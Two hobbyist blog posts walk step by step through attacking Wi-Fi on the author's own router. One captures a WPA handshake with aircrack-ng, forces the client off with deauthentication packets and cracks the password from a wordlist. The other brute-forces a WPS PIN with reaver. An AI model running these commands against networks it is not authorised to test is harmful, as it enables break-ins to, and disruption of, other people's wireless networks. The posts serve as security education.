Friday, 5 July 2013

Cracking WPA-PSK

Okay, so today i got my wireless card through, i know i normally do a post every Wednesday, but i decided to get a post up today due to the massive amount of readers I've had (about 1,000 in the last 2 days) and the wireless card arriving.

The Target

The target for this wireless security penetration test is my spare Netgear N600 router running DD-WRT firmware. The router operates over all the 802.11 standards up to N. (both 2.4GHz and 5GHz).

The tools

  • Software
    • Aircrack-ng
    • OS : Backbox
  • hardware
    • Thinkpad x201t (i7+8GB)
    • Atheros AR9271 Wireless Card
    • Client : HTC One XL


The test

First off, we need a monitor interface, luckily, airmon-ng (part of aircrack-ng) can virtualise a monitor interface from our managed wlan0 interface.

If you can't see, i ran the command
airmon-ng start wlan0

This provided us with our monitor interface mon0.

Next we need to check our wireless network is in range, so run
airodump-ng mon0

This should provided a screen similar to the one below.

Before we proceed, I'm just going to briefly explain the screen above. You should be able to see 2 dynamic tables (that being tables which the values are not stationary and keep altering). The top table is all the routers in range, this is our main table for now, the bottom table is of all the devices talking to routers and what routers that they are talking to. To keep it brief, the main 2 columns on the top table we are interested in are the BSSID, the ENC and CH. These are the MAC address of the router, the encryption and the channel.

Our next command is based on the last, but we are going to narrow down to the specific network we are testing to easily see what devices are connected. The command is formatted as the following
airodump-ng --bssid {bssid of the router} --channel {channel the router is operating on} {interface}

So for me it was
airodump-ng --bssid 20:4E:7F:A5:2A:DC --channel 1 mon0

This gave me a output like the following screen shot

Now we can see the device connected, the bottom table is now the important one, the BSSID is still the routers MAC address, but the STATION is now the clients MAC address. We should be getting a decent number in the packets field as well for this to work. It shows we have a decent connection to both devices.
Quickly before we continue, re run the airodump-ng command with the -w option before the interface, after -w put the name of the file you wish to save to.
Now we can really begin, remember in the post about WPA, we talked a lot about the handshake, well now we are going to grab it. The only problem we have is that the connection between client and AP is already made, so we need to disconnect them. Since we are working in our own environment we could do it manually, but my phone is the other side of the room and i'm a lazy person, so we will use another part of the aircrack-ng suite, aireplay-ng.
aireplay-ng requires only a couple of parameters for this operation, first off, -0 (this is the number not the letter). This tells the program we are going to be de-authenticating clients from routers, next a number of times to send the de-authentication packets. I choose 100 as i can stop it when i begin to get results, which i did. Next we need the MAC address of the access point using the -a then the MAC address, then the MAC Address using the -c and then the MAC address. Finally we need the interface. Just to clear it up here's a example
aireplay-ng -0 {number of times to try} -a {AP MAC address} -c {client MAC address} {interface}

Which for me became
aireplay-ng -0 100 -a 20:4E:7F:A5:2A:DC -c E8:99:C4:A1:8E:7E mon0


In the screen above, at the end of the top line, it says we have a handshake, this should be on your screen as well if you have succeeded.
Now to find the files we captured, just to ensure they are there.

Now to crack it, and get the password back, if you want to know how this process will work, refer to my prior post on WPA encryption algorithms.
To do this we will use the final part of the aircrack-ng suite for today. This is aircrack-ng itself. aircrack-ng is a massive cracking application which will pick out the correct EAPOL packets and find the MIC+ANounce+SNounce etc. this can work on both WPA and WEP. So we need to build a command for it, the basic formation of the command is
aircrack-ng -a 2 -w {wordlist file} {your .cap file}

Mine was:
aircrack-ng -a 2 -w /home/spectr3/Desktop/wordlists/rockyoualtered.txt blogcap.cap

This wordlist i inserted the password into on line 440. aircrack-ng took less than a second to get to the password, try it and find it as correct. giving me this screen:

As you can see the password was "Haxx4Lulz".

Hopefully this week you have enjoyed the session, if you want to message me, my email is martyncprice@gmail.com (there is also a paypal account linked to it if anyone wants to donate for some 802.11ac equipment so i can test if "beam forming" has any effect on cracking WPA networks).
Hope to see you all again on Wednesday.
-Spectr3

Wednesday, 3 July 2013

WPS

Hey all, i know im taking ages with this wireless card but it turns out i had it sent to my old residence the other side of Britain, so while i sort that out, i thought i would talk about WPS(Wi-Fi simple config or Wireless protected setup).

What is it?

A secure WPA/WPA2 password is a random sequence of numbers and letters, not a word (dictionary attacks can get them). This as you can imagine can be hard to remember, try remembering 3F4KJ5R7 for the next few days, you will forget by the end of the week unless you have a eidetic memory. To keep the story short, a bright spark came up with WPS.

For those of you who are un-aware what WPS is, its a feature in some routers where by to connect you can just type a 8 digit number into the computer that is on the router. There is a massive flaw in this as the router tells the user when you have the first 4 digits correct, essentially cutting the time to find the key substantially. Originally to break into a router, due to a optional lockdown, which not all routers implemented, it can take 6.3 years if you had to get all 8 digits, but with only having to get 2 groups of 4 digits, this time comes down to about a day (commonly more around 6-10 hours in practise). The lockdown basically tells the router to stop accepting WPS keys for 60 seconds after every 3 failed attempts.

How to break it

This is purely for the purposes of education, i personally believe in the freedom of educational knowledge, and if you know something you should share it, i do not encourage breaking into someone elses router, if you do, more fool you, its illegal and if you are caught you will be locked up, yes you can tell your friends you where "hacking" but this is not true hacking, there is no programming involved, no clever tricks, just logic.

Anyway, so now i have covered myself against stupid people doing illegal things and getting caught, we shall proceed to breaking it. I've already told you how it can be broken, but im going to go over it very quickly, but first a few tools, if you know them, please feel free to skip over.

Aircrack-ng suite

The aircrack-ng suite is a beautiful suite and a wireless "hackers" best friend, it has almost everything we need for this attack, i would advise getting it pre-installed in a distribution of linux. My personal recommendation is different from the norm, it used to be backtrack (now kali), but as BT5r3 was based on ubuntu 10.10 LTS it can be unstable if you play about too much, i personally recommend backbox. This distribution i find to be clean and enjoyable to use, its based off ubuntu 12.04 LTS (xbuntu to be exact due to xfce).

Reaver

The last tool is reaver. This is the main tool we will be using. To install just open terminal and type
apt-get install reaver
This will install reaver for you, if you get a error try
sudo apt-get install reaver
And type in your password (basically sudo gives you the ability to over rule lack of permissions, like "run as administrator" on windows.
Once we have both of these installed, we are ready.

Lets get attacking

All of the following happens in terminal, so put away your GUI, its CLI time :D
First of all we need to bring up a monitor mode interface, so run
iwconfig
You should be able to see your wireless card as wlan0.
Next type
airmon-ng start wlan0
This will bring your wireless card into a monitor mode (there are seven wireless modes, for more info check my first post about wireless) and this monitor mode should be a new interface called mon0, run iwconfig if you want to check it' there.
Now type in
airodump-ng mon0
This will start a program which will display all your wireless networks in range on the top area, in the bottom, it will show all the connections visible between client and access point.
When you can see your wireless network to attack, press ctrl+c to stop the program. Next you should have on your screen atleast one wireless network, this is the one you are going to attack, so copy the MAC address, it should look like XX:XX:XX:XX:XX:XX (note. you cannot ctrl+c or ctrl+x in terminal, they are reserved for other things, so instead you must right click > copy).
hopefully you now have your MAC address to attack in your clipboard (the place your computers stores the copied text).
Final step, the actual attack using reaver.
Reaver requires 2 arguements, these are the interface (mon0) and the MAC address of the access point to attack, to execute, type the following, substituting where appropriate
reaver -i mon0 -b <MAC address here>
And thats the entire command finished, now just sit back and wait.

Hopefully this is enough for today, ill be back next week (hopefully ill have this wireless card issue resolved).
-Spectr3